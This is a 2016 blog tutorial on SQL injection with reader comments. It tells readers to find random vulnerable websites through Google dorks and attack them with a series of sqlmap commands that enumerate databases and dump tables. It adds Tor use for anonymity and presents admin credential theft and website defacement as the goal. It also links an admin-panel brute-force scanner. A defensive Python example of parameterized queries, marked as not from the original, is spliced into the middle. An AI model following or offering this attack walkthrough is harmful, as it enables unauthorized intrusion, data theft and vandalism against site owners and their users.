We all know websites need a database to store data. Typically this is an RDBMS, a relational database management system. These databases store data in tables and columns so that it can be accessed easily. Server-side languages like PHP can interact with an SQL database, given proper authentication and read/write permission. Much of the sensitive information, such as login credentials, is stored in these databases. A hacker's first preference is to take down a database so that he can log in to the admin panel with the credentials he retrieved.

SQL injection is a method of exploiting a vulnerability in a server-side script. Scripts that do not filter special characters properly are vulnerable to this attack. If an unfiltered string is allowed into the query, the string gets executed as part of the query. This way of injecting custom-crafted queries into a script is called SQL injection.


Consider a scenario: a PHP script that accepts a GET parameter "name" and searches a table in a database (e.g. URL: www.example.com/search.php?name=bill).

The query looks like this:

SELECT * FROM `profiles` WHERE name = 'bill';

If you add a single quote at the end of the URL, the query gets executed like this:

SELECT * FROM `profiles` WHERE name = 'bill'';

This will give you a syntax error, which means the target is vulnerable. Instead of the single quote, we inject our custom queries to fetch the sensitive data.
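The scenario above as an added example (not code from the original post), using Python's sqlite3 in place of the PHP/MySQL script and constructed sample rows: the concatenated query breaks on a quote, while a bound parameter treats the quote as ordinary data. The function names and the email column are assumptions made for the illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data standing in for the article's `profiles` table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE profiles (name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO profiles VALUES (?, ?)",
        [("bill", "bill@example.com"), ("o'neil", "oneil@example.com")],
    )
    return conn

def search_vulnerable(conn, name):
    # The pattern the article describes: the parameter is pasted into the
    # SQL text, so a quote in `name` changes the structure of the statement.
    query = "SELECT * FROM profiles WHERE name = '" + name + "';"
    return conn.execute(query).fetchall()

def search_safe(conn, name):
    # Bound parameter: the SQL text is fixed and the value is sent separately,
    # so quotes in `name` can never terminate the string literal.
    return conn.execute(
        "SELECT * FROM profiles WHERE name = ?", (name,)
    ).fetchall()

def try_search(fn, conn, name):
    # Report either the rows or the database error, as a web page would leak it.
    try:
        return ("ok", fn(conn, name))
    except sqlite3.Error as exc:
        return ("sql error", str(exc))

if __name__ == "__main__":
    conn = make_db()
    # "bill'" is the article's test input; "o'neil" is a legitimate name
    # that the concatenating version cannot even look up.
    for name in ("bill", "bill'", "o'neil"):
        print(repr(name), "vulnerable:", try_search(search_vulnerable, conn, name))
        print(repr(name), "safe:      ", try_search(search_safe, conn, name))
```

The same fix in PHP is a prepared statement with a bound parameter instead of string concatenation.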


Finding a target

You can randomly choose a target using Google dorks. In the Google search bar try the keyword:
You will get plenty of results; choose a target and open the URL with a quote added at the end. If the website shows a syntax error or a blank page, the site is most probably vulnerable. Copy the target URL to the clipboard. There are plenty of other dorks; try those too.


Sqlmap is a Python script designed exclusively for database attacks. It's very stable and has many options. So let's start.
# sqlmap -u "http://target.com/vuln.php?id=1" --dbs


This is the first step. Sqlmap will scan the given parameter for all possible injection techniques. Once it finds a possible method, sqlmap will ask whether you want to scan for more vulnerabilities. You can stop or continue; that's up to you. Since we gave the "--dbs" option, sqlmap will retrieve the database names. Once you get the database name you can fetch tables and columns.
# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name --tables

After fetching database and tables, fetch columns


# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name -T table_name --columns

Dump the data from the columns


# sqlmap -u "http://target.com/vuln.php?id=1" -D database_name -T table_name -C column_name --dump





Sqlmap can be used with a Tor proxy for safe and anonymous attacks
# sqlmap --tor --check-tor --tor-type=SOCKS5 -u "http://target.com/vuln.php?id=1" --dbs


Increase the speed using multi-threading


# sqlmap --threads 10 -u "http://target.com/vuln.php?id=1" --dbs

This will help you get the admin login details. You can access the control panel and deface the whole website. I have designed a simple script to find the admin panel of a website. Download cpscan.py from GitHub.


or directly clone by the command


# git clone https://github.com/susmithHCK/cpscan.git


This Python script brute-forces all the possible directories of a server and detects the control panel by HTTP response codes. This can detect almost 85% of websites. Hope this helped you guys. For any doubts or questions, please use the comment box below.


Susmith Krishnan

I’m a computer enthusiast basically and I love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and I would like to explore security vulnerabilities and latest tech news and wanna share with you.


Akash Patel · May 13, 2016 at 5:01 am

Whoa! Thanks, amazing tutorial, man! Keep sharing..

    admin · May 13, 2016 at 10:05 am

    Using google search or in sqlmap itself?

Frederic Ip · July 15, 2016 at 9:40 pm

Thank you for the good writeup. It in fact was a amusement account it. Look advanced to far added agreeable from you! However, how can we communicate?

    susmith HCK · July 15, 2016 at 11:42 pm

    add me on facebook messenger m.me/SusmithHCK
